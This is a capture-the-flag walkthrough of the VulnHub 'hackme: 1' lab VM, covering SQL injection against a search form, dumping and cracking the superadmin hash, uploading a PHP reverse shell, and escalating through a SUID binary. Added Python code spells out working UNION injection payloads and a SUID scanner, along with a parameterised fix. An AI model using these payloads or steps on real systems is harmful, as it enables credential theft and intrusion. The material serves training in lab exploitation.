VulnHub: hackme: 1

Initial Foothold

  1. Network discovery

My target is 192.168.60.129.

2. TCP Portscan

There are 2 open services: SSH and HTTP.

3. UDP scan

4. OS and service scan

5. Vuln scan

There are HTTP pages that I can access.

Service Enumeration

  • SSH

Connect

  • HTTP
  1. nikto scan

2. Directory scan

3. Access site

The site requires a username and password, and I can also sign up.

View page source

Access /uploads/

Register new user

Log in

There is a search function that returns 3 columns. My guess is that the search function passes my input into an SQL query.

Exploitation

  1. Test for SQL injection

No data

Try another test query

Succeeded. Next, I continue injecting queries to retrieve some data.

There are 3 columns, so my guess is that a UNION with 1,2,3 will work. There is no need to test for the column count like this:

So my query is:

As predicted, this query needs 3 columns.

Retrieve trivial data

The MySQL version is 5.7.25-0ubuntu0.18.10.2.

The hostname is hackme.

Database is webapphacking.

Get table name

I have 2 tables: books and users.

The users table is interesting. I will find its columns.

I have 5 columns: id, user, password, name, and address.

I need 3 columns: id, user, and password.

Copy it and organize it in an editor for easier viewing.

My interest is ‘superadmin’.
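The injection steps above (detect the injection, confirm the column count, UNION a probe into a visible column, enumerate tables and columns through the schema metadata, then dump id/user/password) can be demonstrated end to end without the VM. The block below is an added example, not code from the write-up: it builds a constructed in-memory SQLite stand-in for the webapphacking database with made-up rows and unsalted MD5 hashes (an assumption about the hash format), shows the vulnerable string-concatenated query next to its parameterised fix, and runs the same payloads against both. The MySQL payloads that match the write-up's steps are kept in `MYSQL_PAYLOADS` for reference; the demo runs the SQLite equivalents (sqlite_master and pragma_table_info stand in for information_schema).

```python
import hashlib
import sqlite3

# MySQL payloads matching the write-up's steps (the target runs MySQL 5.7).
# Reference only; the demo runs SQLite equivalents against an in-memory stand-in.
MYSQL_PAYLOADS = {
    "version":  "' UNION SELECT 1, @@version, 3 -- -",
    "hostname": "' UNION SELECT 1, @@hostname, 3 -- -",
    "database": "' UNION SELECT 1, database(), 3 -- -",
    "tables":   "' UNION SELECT 1, table_name, 3 FROM information_schema.tables"
                " WHERE table_schema = database() -- -",
    "columns":  "' UNION SELECT 1, column_name, 3 FROM information_schema.columns"
                " WHERE table_name = 'users' -- -",
    "dump":     "' AND 1=0 UNION SELECT id, user, password FROM users -- -",
}


def build_db():
    """Constructed stand-in for the 'webapphacking' database (sample rows only)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE books (id INTEGER, title TEXT, author TEXT);
        CREATE TABLE users (id INTEGER, user TEXT, password TEXT, name TEXT, address TEXT);
        INSERT INTO books VALUES (1, 'Book One', 'Author A'), (2, 'Book Two', 'Author B');
    """)
    # Unsalted MD5 of made-up passwords: an assumption about the app's hash format.
    for uid, user, pw in [(1, "user1", "commonpassword"), (2, "superadmin", "Uncrackable1")]:
        digest = hashlib.md5(pw.encode()).hexdigest()
        conn.execute("INSERT INTO users VALUES (?, ?, ?, ?, ?)", (uid, user, digest, user, "n/a"))
    return conn


def search_vulnerable(conn, term):
    """What the write-up guesses sits behind the search box: input glued into the SQL."""
    sql = f"SELECT id, title, author FROM books WHERE title LIKE '%{term}%'"
    return conn.execute(sql).fetchall()


def search_fixed(conn, term):
    """Parameterised version: the term is bound as data and never parsed as SQL."""
    sql = "SELECT id, title, author FROM books WHERE title LIKE ?"
    return conn.execute(sql, (f"%{term}%",)).fetchall()


def is_injectable(conn, search=search_vulnerable):
    """Step 1: a lone quote breaks the statement, and ' OR 1=1 returns every row."""
    try:
        search(conn, "'")
        quote_breaks = False
    except sqlite3.Error:
        quote_breaks = True
    total = conn.execute("SELECT count(*) FROM books").fetchone()[0]
    return quote_breaks and len(search(conn, "' OR 1=1 -- -")) == total


def count_columns(conn, max_cols=10):
    """Step 2: ORDER BY n succeeds until n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        try:
            search_vulnerable(conn, f"' ORDER BY {n} -- -")
        except sqlite3.Error:
            return n - 1
    return None


def union_probe(conn, expr, from_clause=""):
    """Step 3: put a probe expression in column 2 of a UNIONed row. The markers
    1 and 3 in the other slots separate injected rows from real search results."""
    rows = search_vulnerable(conn, f"' UNION SELECT 1, {expr}, 3 {from_clause} -- -")
    return sorted(r[1] for r in rows if r[0] == 1 and r[2] == 3)


def list_tables(conn):
    # MySQL: FROM information_schema.tables WHERE table_schema = database()
    return union_probe(conn, "name", "FROM sqlite_master WHERE type = 'table'")


def list_columns(conn, table):
    # MySQL: FROM information_schema.columns WHERE table_name = '<table>'
    return union_probe(conn, "name", f"FROM pragma_table_info('{table}')")


def dump_credentials(conn):
    """Step 4: AND 1=0 suppresses the real rows so only id/user/password come back."""
    rows = search_vulnerable(conn, "' AND 1=0 UNION SELECT id, user, password FROM users -- -")
    return {user: pw_hash for _id, user, pw_hash in rows}


if __name__ == "__main__":
    db = build_db()
    print("injectable:", is_injectable(db), "| after fix:", is_injectable(db, search_fixed))
    print("columns:", count_columns(db))
    print("tables:", list_tables(db))
    print("users columns:", list_columns(db, "users"))
    print("credentials:", dump_credentials(db))
```

Two details worth noticing: the comment sequence `-- -` terminates the query in both MySQL and SQLite (MySQL requires whitespace after `--`, and `#` is MySQL-only), and the `AND 1=0` prefix on the dump payload is what removes the need to "organize it in an editor", since it empties the legitimate result set before the UNION. Against `search_fixed` every payload is just a literal search string and the same checks report nothing.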

Copy the hash and crack it with CrackStation. Now I have the password.

Login as superadmin.

I can upload files. I’ll try to upload a reverse shell.

Prepare a reverse shell PHP script.

Prepare a listener

Upload the file

Access it via /uploads/, click the file.

Back at the listener, I now have the connection.

Test it

Upgrade to a TTY shell

Privilege Escalation

  1. Explore directory

I got the MySQL root credentials.

Try to reuse them on the SSH service.

Failed!!!

I found this ‘touchmenot’ file.

Let’s try to run it

Now I’m root.

The reason running it gives a root shell immediately is that the binary is SUID root: it executes with the privileges of its owner rather than of the user who runs it. Normally, you have to search for SUID binaries with this command:

From the result, you can continue the escalation process. This time I was just lucky during directory enumeration and saved a lot of time finding it.
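The same check, done programmatically rather than with the `find` one-liner, as an added example that is not part of the write-up. It walks a tree for regular files with the SUID (or SGID) bit set, then separates the binaries that are SUID on a normal install from the ones that deserve a closer look; `touchmenot` would land in the second group. The `STANDARD_SUID` set is a triage aid I am assuming here, not an allowlist: a standard binary can still be exploitable if it is outdated or misconfigured. `make_demo_tree()` builds a constructed sample directory (one file with mode 4755 named `touchmenot`, one ordinary file) so the block runs offline without touching the real filesystem.

```python
import os
import stat
import tempfile

# Binaries that are SUID on a stock Linux install; everything else is worth a look.
# Assumed triage list for this example, not an exhaustive or authoritative set.
STANDARD_SUID = {
    "su", "sudo", "passwd", "chsh", "chfn", "gpasswd", "newgrp", "chage", "expiry",
    "mount", "umount", "ping", "pkexec", "fusermount", "fusermount3", "ssh-keysign",
    "at", "crontab", "Xorg", "dbus-daemon-launch-helper", "polkit-agent-helper-1",
}

# Pseudo-filesystems that only add noise (and errors) when scanning from "/".
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run"}


def find_suid(root="/", setgid=False):
    """Regular files under `root` with the SUID bit set (SGID if setgid=True).
    Equivalent to: find / -perm -4000 -type f 2>/dev/null
    Returns (path, owner uid, permission bits as an octal string) tuples."""
    wanted = stat.S_ISGID if setgid else stat.S_ISUID
    hits = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue                     # unreadable entries are the "2>/dev/null" part
            if stat.S_ISREG(st.st_mode) and st.st_mode & wanted:
                hits.append((path, st.st_uid, oct(stat.S_IMODE(st.st_mode))))
    return sorted(hits)


def unusual_suid(hits):
    """Filter find_suid() output down to binaries that are not SUID by default."""
    return [h for h in hits if os.path.basename(h[0]) not in STANDARD_SUID]


def make_demo_tree():
    """Constructed sample tree: a SUID 'touchmenot' and an ordinary file."""
    root = tempfile.mkdtemp(prefix="suid-demo-")
    suid_path = os.path.join(root, "touchmenot")
    plain_path = os.path.join(root, "readme")
    for path in (suid_path, plain_path):
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\necho hi\n")
    os.chmod(suid_path, 0o4755)    # rwsr-xr-x: the bit that made touchmenot a root shell
    os.chmod(plain_path, 0o755)
    return root, suid_path


if __name__ == "__main__":
    demo_root, _ = make_demo_tree()
    for path, uid, mode in find_suid(demo_root):
        print(mode, uid, path)
    print("unusual:", [h[0] for h in unusual_suid(find_suid(demo_root))])
```

On a real target call `find_suid("/")` and pass the result to `unusual_suid()`; the owner uid matters as much as the bit, since a SUID file owned by an unprivileged user only gets you that user. Note that the demo only sets the bit on a file it created; whether the kernel honours it on execution depends on the mount (a `nosuid` mount stores the bit but ignores it), which is also why the write-up's "just run it" step worked on the VM.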